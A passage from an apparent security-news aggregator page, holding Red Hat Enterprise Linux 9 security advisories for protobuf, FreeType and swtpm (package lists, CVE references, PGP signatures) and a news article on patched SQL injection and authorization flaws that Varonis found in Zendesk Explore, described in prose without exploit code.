guestfs-tools-debugsource-1.48.2-5.el9.s390x.rpm

x86_64:  
guestfs-tools-1.48.2-5.el9.x86_64.rpm  
guestfs-tools-debuginfo-1.48.2-5.el9.x86_64.rpm  
guestfs-tools-debugsource-1.48.2-5.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2211  
https://access.redhat.com/security/updates/classification/#low  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMidzjgjWX9erEAQh1Bg/+K+5p4OKmDWKd99Hn29Ow87+XRfhVNv/F  
jOb8SAOy0KnxyJgMPCEAD+JqARNMkAI14bcYYEAnLvOUJgkxEzaJiiwPLjsIgolK  
juf7fi8Ikl8VSRtoZIujpOGFqAEYeRxDUPt/p36mw/iLlRPZt9OvDSTl0kEo1FaZ  
v8BmbqLPr6wGiLZtQmJ0jO+2E1K2m1dmFcUeCt9crA0ehN3gpOULWorJyYtGnFKr  
dWtez1O6uurEl93IWbMM/n8C1vr1NYXqZo0GhfKXiSKiUmtR6a8WbzEr87nkK30E  
yoHPvhi1NgSZ8X1ONZ7MDBC+six+54VVqUyK/VMyLZE8/BozKEIOaCk8CBM4adJH  
6KBW7y/nn40izHcYUcw44r/6B/09zeN5coYoIBqq+PUwwp5vTU8I17A8pZncxYPM  
e22eeTpID97lwT4AMeTXbC2EdMTMTNVsW13ZSONF3fXYMjGgcdoefeP803OUGIzm  
uus7znkLd5lR9V5KQnB60JBFVf6tEYqahQEI5E/UCDNJcw0UNTIegJUEXVBqBVqM  
wV63DANh2yvRWQsESMvxthWjxMVGkV+2R1P/2py5kD7mIUxlDLWJe3QKtJESTRkl  
TyIdgMQ9TIR2jSMz/cZ2gPdZgUOrNu6kvgZqoom3t1DcK+E465r9QA1jh/WoQfwl  
WbKw9UbaLms=j1SI  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7959-01

Red Hat Security Advisory 2022-7970-01 - The protobuf packages provide Protocol Buffers, Google's data interchange format. Protocol Buffers can encode structured data in an efficient yet extensible format, and provide a flexible, efficient, and automated mechanism for serializing structured data.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: protobuf security update  
Advisory ID:       RHSA-2022:7970-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7970  
Issue date:        2022-11-15  
CVE Names:         CVE-2021-22570  
====================================================================  
1. Summary:

An update for protobuf is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The protobuf packages provide Protocol Buffers, Google's data interchange  
format. Protocol Buffers can encode structured data in an efficient yet  
extensible format, and provide a flexible, efficient, and automated  
mechanism for serializing structured data.

Security Fix(es):

* protobuf: Incorrect parsing of nullchar in the proto symbol leads to  
Nullptr dereference (CVE-2021-22570)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2049429 - CVE-2021-22570 protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
protobuf-3.14.0-13.el9.src.rpm

aarch64:  
protobuf-3.14.0-13.el9.aarch64.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.aarch64.rpm  
protobuf-debuginfo-3.14.0-13.el9.aarch64.rpm  
protobuf-debugsource-3.14.0-13.el9.aarch64.rpm  
protobuf-lite-3.14.0-13.el9.aarch64.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.aarch64.rpm

noarch:  
python3-protobuf-3.14.0-13.el9.noarch.rpm

ppc64le:  
protobuf-3.14.0-13.el9.ppc64le.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.ppc64le.rpm  
protobuf-debuginfo-3.14.0-13.el9.ppc64le.rpm  
protobuf-debugsource-3.14.0-13.el9.ppc64le.rpm  
protobuf-lite-3.14.0-13.el9.ppc64le.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.ppc64le.rpm

s390x:  
protobuf-3.14.0-13.el9.s390x.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.s390x.rpm  
protobuf-debuginfo-3.14.0-13.el9.s390x.rpm  
protobuf-debugsource-3.14.0-13.el9.s390x.rpm  
protobuf-lite-3.14.0-13.el9.s390x.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.s390x.rpm

x86_64:  
protobuf-3.14.0-13.el9.i686.rpm  
protobuf-3.14.0-13.el9.x86_64.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.x86_64.rpm  
protobuf-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-debuginfo-3.14.0-13.el9.x86_64.rpm  
protobuf-debugsource-3.14.0-13.el9.i686.rpm  
protobuf-debugsource-3.14.0-13.el9.x86_64.rpm  
protobuf-lite-3.14.0-13.el9.i686.rpm  
protobuf-lite-3.14.0-13.el9.x86_64.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
protobuf-compiler-3.14.0-13.el9.aarch64.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.aarch64.rpm  
protobuf-debuginfo-3.14.0-13.el9.aarch64.rpm  
protobuf-debugsource-3.14.0-13.el9.aarch64.rpm  
protobuf-devel-3.14.0-13.el9.aarch64.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.aarch64.rpm  
protobuf-lite-devel-3.14.0-13.el9.aarch64.rpm

ppc64le:  
protobuf-compiler-3.14.0-13.el9.ppc64le.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.ppc64le.rpm  
protobuf-debuginfo-3.14.0-13.el9.ppc64le.rpm  
protobuf-debugsource-3.14.0-13.el9.ppc64le.rpm  
protobuf-devel-3.14.0-13.el9.ppc64le.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.ppc64le.rpm  
protobuf-lite-devel-3.14.0-13.el9.ppc64le.rpm

s390x:  
protobuf-compiler-3.14.0-13.el9.s390x.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.s390x.rpm  
protobuf-debuginfo-3.14.0-13.el9.s390x.rpm  
protobuf-debugsource-3.14.0-13.el9.s390x.rpm  
protobuf-devel-3.14.0-13.el9.s390x.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.s390x.rpm  
protobuf-lite-devel-3.14.0-13.el9.s390x.rpm

x86_64:  
protobuf-compiler-3.14.0-13.el9.i686.rpm  
protobuf-compiler-3.14.0-13.el9.x86_64.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-compiler-debuginfo-3.14.0-13.el9.x86_64.rpm  
protobuf-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-debuginfo-3.14.0-13.el9.x86_64.rpm  
protobuf-debugsource-3.14.0-13.el9.i686.rpm  
protobuf-debugsource-3.14.0-13.el9.x86_64.rpm  
protobuf-devel-3.14.0-13.el9.i686.rpm  
protobuf-devel-3.14.0-13.el9.x86_64.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.i686.rpm  
protobuf-lite-debuginfo-3.14.0-13.el9.x86_64.rpm  
protobuf-lite-devel-3.14.0-13.el9.i686.rpm  
protobuf-lite-devel-3.14.0-13.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-22570  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMf9zjgjWX9erEAQjPrxAAn/Wr7VqkJ14hap/PSkN2C1Ltwp5Jpwms  
RUgoqJhr0JI19nD6WME9H0sSJNLMAaS/jaMY5iaBEUURv0KTHX+UHdsJDSAMjKtK  
iqIwky9Db1EJSTAY+oR9DbUkK5A491GsmXL32Su/Bktf+7LCEu7pFoCo1aPIrIGT  
PUJmj/oxy4OwHN6qATEEHvGV8U2eoACZHjeuHDwF3y+rwzsg7Yk/xci01xq9PVhf  
vRtMYtJO5J1MFtLLS9Tgq9XqqhZkrJ2Yfbo6QXawZdWLgrB+flbrImZJPfkILe8X  
FKao9rbZEfJ7EUvIgFevtNsUMBhpb1ZzwmcpjigjqgHWW4HWWFOqgZ4Y7p26TejV  
7T42NbJccqFJ0UUQvPAAOeg331CgQfeps/ZUbakXkUzTB3xhfMwFbXmjEkycwCN+  
a5y6aQDWabrjANNjP2x78iESf6Ra2/WNWyTETat/KjONKWTmpkBrnJsHSscYnIC+  
g3Br7EYXKcRC6Gqrcripv2l2HY9FR/G31uQzG40NipnduzbKzhEeFv3FaVJR6P7c  
5T6BcLQLC7gu1LPL/ztgB42KpdtVycCfwQoGcvz2tlih9jlDqH1/RbhayPXrvvR5  
KwDlz6Xyov7I1VRWn33oKlSyFsh5WyiLVE1NxcgHA/sV3zQbC+4T+MqUKTYGcG/D  
iXcioojD/tg"7y  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7970-01

Red Hat Security Advisory 2022-8340-01 - FreeType is a free, high-quality, portable font engine that can open and manage font files. FreeType loads, hints, and renders individual glyphs efficiently. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: freetype security update  
Advisory ID:       RHSA-2022:8340-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8340  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-27404 CVE-2022-27405 CVE-2022-27406  
====================================================================  
1. Summary:

An update for freetype is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, x86_64

3. Description:

FreeType is a free, high-quality, portable font engine that can open and  
manage font files. FreeType loads, hints, and renders individual glyphs  
efficiently.

Security Fix(es):

* FreeType: Buffer overflow in sfnt_init_face (CVE-2022-27404)

* FreeType: Segmentation violation via FNT_Size_Request (CVE-2022-27405)

* Freetype: Segmentation violation via FT_Request_Size (CVE-2022-27406)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The X server must be restarted (log out, then log back in) for this update  
to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2077985 - CVE-2022-27406 Freetype: Segmentation violation via FT_Request_Size  
2077989 - CVE-2022-27404 FreeType: Buffer overflow in sfnt_init_face  
2077991 - CVE-2022-27405 FreeType: Segmentation violation via FNT_Size_Request

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
freetype-debuginfo-2.10.4-9.el9.aarch64.rpm  
freetype-debugsource-2.10.4-9.el9.aarch64.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.aarch64.rpm  
freetype-devel-2.10.4-9.el9.aarch64.rpm

ppc64le:  
freetype-debuginfo-2.10.4-9.el9.ppc64le.rpm  
freetype-debugsource-2.10.4-9.el9.ppc64le.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.ppc64le.rpm  
freetype-devel-2.10.4-9.el9.ppc64le.rpm

s390x:  
freetype-2.10.4-9.el9.s390x.rpm  
freetype-debuginfo-2.10.4-9.el9.s390x.rpm  
freetype-debugsource-2.10.4-9.el9.s390x.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.s390x.rpm  
freetype-devel-2.10.4-9.el9.s390x.rpm

x86_64:  
freetype-debuginfo-2.10.4-9.el9.i686.rpm  
freetype-debuginfo-2.10.4-9.el9.x86_64.rpm  
freetype-debugsource-2.10.4-9.el9.i686.rpm  
freetype-debugsource-2.10.4-9.el9.x86_64.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.i686.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.x86_64.rpm  
freetype-devel-2.10.4-9.el9.i686.rpm  
freetype-devel-2.10.4-9.el9.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
freetype-2.10.4-9.el9.src.rpm

aarch64:  
freetype-2.10.4-9.el9.aarch64.rpm  
freetype-debuginfo-2.10.4-9.el9.aarch64.rpm  
freetype-debugsource-2.10.4-9.el9.aarch64.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.aarch64.rpm

ppc64le:  
freetype-2.10.4-9.el9.ppc64le.rpm  
freetype-debuginfo-2.10.4-9.el9.ppc64le.rpm  
freetype-debugsource-2.10.4-9.el9.ppc64le.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.ppc64le.rpm

x86_64:  
freetype-2.10.4-9.el9.i686.rpm  
freetype-2.10.4-9.el9.x86_64.rpm  
freetype-debuginfo-2.10.4-9.el9.i686.rpm  
freetype-debuginfo-2.10.4-9.el9.x86_64.rpm  
freetype-debugsource-2.10.4-9.el9.i686.rpm  
freetype-debugsource-2.10.4-9.el9.x86_64.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.i686.rpm  
freetype-demos-debuginfo-2.10.4-9.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMTdzjgjWX9erEAQjteg//QLNAtgbT2lQ22DuWeCZaK/rCM1AuBKhs  
tQkNtVtq35p9A6LPXuXpPO/u7HNphJZtLo7UlgFyWcLQzDYvexHh0sTzsy7jc2OC  
5FBhZykE+AmRx3XVMPmZYrUL5Kc9pwGZtkbf0+fcZxszcQdmIezJJpozi94Nk6XZ  
gq6pcGjPPLs2XSJ2082n6e+MLi715z/HGRCKRYpntf3spl0naweBrlBGbNQQoCff  
ToMOVUhymGXI4FXE4mOaAVL1g6JM0kEfxlQ2dzu3oNkBqRGOuFXhAODWiTYq8TSU  
5I/TvV8zDY9l17ZIxwq2D+4qLkfPeq2eZWcUD0cBKjzH9tGFgqDDV7Iqi4WXxX50  
7DOqYJzF7Aau+9K13TTz/GzI2Gd38yPrFafId/3Jz1X7j9Jtwh4oVmBOsFRnmFqC  
X4Qijv7Ga6svFb/F1yBFNdHfiM2Y4kxAnx97hk5MXttfAfQCvaKgvwLjSkmyXfil  
N7Gq0EOaGbFrkEDHglrIAgJUotfP6H13wa7xyf8LrbMUSqGoQvm+zsB+pgkFTvh0  
a5JVk1qmnTSC5K2S5H9PwvVZRskxFqvclukXKIFSz8BIrL9izGWDHE7JLbKoO+YF  
WNmFrhUJ8+wZ4LN9J6lqZwsWdohESDBlhjtstFA3R+Zmr8jQHZ1whTdwulle3BLs  
78p4ASQioNU47i  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8340-01

Red Hat Security Advisory 2022-8100-01 - SWTPM is a TPM emulator built on libtpms providing TPM functionality for QEMU VMs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Low: swtpm security and bug fix update  
Advisory ID:       RHSA-2022:8100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8100  
Issue date:        2022-11-15  
CVE Names:         CVE-2022-23645  
====================================================================  
1. Summary:

An update for swtpm is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

SWTPM is a TPM emulator built on libtpms providing TPM functionality for  
QEMU VMs.

Security Fix(es):

* swtpm: Unchecked header size indicator against expected size  
(CVE-2022-23645)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.1 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2056491 - CVE-2022-23645 swtpm: Unchecked header size indicator against expected size  
2090219 - Not able to install windows 11 OS with vTPM in spec (disable FIPS)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.src.rpm

aarch64:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.aarch64.rpm

s390x:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.s390x.rpm

x86_64:  
swtpm-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-debugsource-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-libs-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-libs-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-tools-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm  
swtpm-tools-debuginfo-0.7.0-3.20211109gitb79fd91.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-23645  
https://access.redhat.com/security/updates/classification/#low  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3OMXtzjgjWX9erEAQgHDA/+OMR2sFGbdP6hED6vJ/mp7wcx8xDO2fcl  
lUsbNs1WXDZ8N0ZFoQNN/iqXOE4f3YtliWHcFQOcacIyTAyev8469r4lTRHK5+RV  
KcQOOvdvVeibxvjR1bQS5hMZET+FWxfcQawVkTZjse6Osef6I3GF7VD5QoSbDI2B  
Lgj9SdvshnG2goTyLpwE9ZFUIyUhWy1CVDEGOFoeLk1zkJFMerkWb/FeQa2yCOxZ  
hPx1d3NIOH6V+bYYRl1owf9SpS/DhQJ7sCsay3zwz8uzjqzSX3x2cnj1U1LgCQ66  
RkP3T1CHY9uRd3T7WT0oAGj4uodtXjf8+64ZgNBKqtv/2Ls7aZciIvRb1xwNVGc2  
fOTSdv3zRPBwoIlxRiCxuqr5kDj3+9b9rGu1xqkedEt+736XaBcQ6uD6gHjFS41R  
2KWxQ/Db0DetUyZc99atVs9YcP5YPqI+XbQWNJaGPmLR3JaZ8JAQTNEQWAKMXQD/  
EPnoPYY8sgmZGDnzZb04IcnYIfvzj3DLWm0JB3cORwawvL1SulFhoikEuJ9DEKPG  
uIhE1nwHfGUlMmIMAbk0dPzoDt80gZMr4nHlWfEUOwCUQrQw6O67Nr9JNd32bwAW  
T77tKs+HriSXYQ9isoaGFnlVsVH965tEte1pHna3YqNznR3GC6Hh072gfJXWf/qx  
XpYcV7g6aB0=l7Di  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8100-01

Patched SQLi and logical access vulnerabilities posed serious risk

Patched SQLi and logical access vulnerabilities posed serious risk

Security researchers from Varonis have published details of SQL injection and logical access vulnerabilities in Zendesk Explore that posed a severe threat for users of the popular customer service platform.

Zendesk acted promptly in response to vulnerability reports by creating patches that required no customer action, according to Varonis.

This is just as well because the vulnerability would have allowed potential miscreants to access conversations, tickets, comments, email addresses, and other information held in Zendesk accounts in instances where Explore was enabled.

Catch up on the latest cybersecurity research news

Potential exploitation would have involved an attacker first registering for the ticketing service as an external user of a targeted Zendesk account, a commonly enabled feature. The vulnerable Zendesk Explore facility is not enabled by default but still widely used because it powers the analytic insights page of the CRM platform.

Zendesk uses multiple GraphQL APIs in its products, especially in the administration console. Because GraphQL is a relatively new API format, this prompted security researchers from Varonis Threat Labs to explore Zendesk’s implementation, in what turned out to be a fruitful search.

**API hunting ground**

Zendesk uses multiple APIs in its products. Varonis Threat Labs found a query field called execute-query. This field stood out because it contains a Base64-encoded JSON object, inside a Base64-encoded XML document, inside a JSON object. Multiple nested encodings like this one usually mean that many different services (likely created by separate developers or even teams) are used to process this data.

“This API method accepts a JSON object with the Query XML, along with multiple other XML parameters, some of which are encoded in Base64,” the researchers explain in a technical blog post.

“One of the fields passed to the API is extra\_param3\_value which includes a plain-text XML document, DesignSchema, not encoded in Base64.”

DesignSchema defines the relationship between an AWS RDS (managed relational database) and the Query XML document.

**Old school SQL injection**

Varonis discovered that the name attributes in this XML document were vulnerable to a SQL injection attack. The security researchers found a way to exploit this vulnerability to exfiltrate data.

In response to questions from The Daily Swig, Michael Buckbee, a security engineer at Varonis, explained that although the issue is complicated on multiple levels by encoding, “at its heart” it’s a classic SQL injection problem.

“The root cause was fields that were not properly filtered in the application,” Buckbee explained.

The researcher added: “While the method that the SQL command is passed from the client back to Zendesk is complicated with multiple levels of Base64-encoded JSON and XML as part of a GraphQL action, the root cause of the SQL Injection isn’t the multiple levels of encoding, but insufficient validation happening on the application server parsing the response.”

The researchers went on to discover that the execute-query API failed to carry out several logical checks on requests.

“Most critically, the API endpoint did not verify that the caller had permission to access the database and execute queries,” Varonis reports. “This meant that a newly created end-user could invoke this API, change the query, and steal data from any table in the target Zendesk account’s RDS, no SQLi required.”

**Zen garden**

Zendesk quickly resolved the issues in Explore with Varonis Threat Labs’ help, without requiring customers to take any action.

The Daily Swig invited Zendesk to comment on the vulnerabilities, Varonis’ research, and its remediation action. We haven’t heard back, as yet, but we’ll update this story as and when more news comes to hand.

YOU MAY ALSO LIKE CSRF in Plesk API enabled server takeover

Tag

#js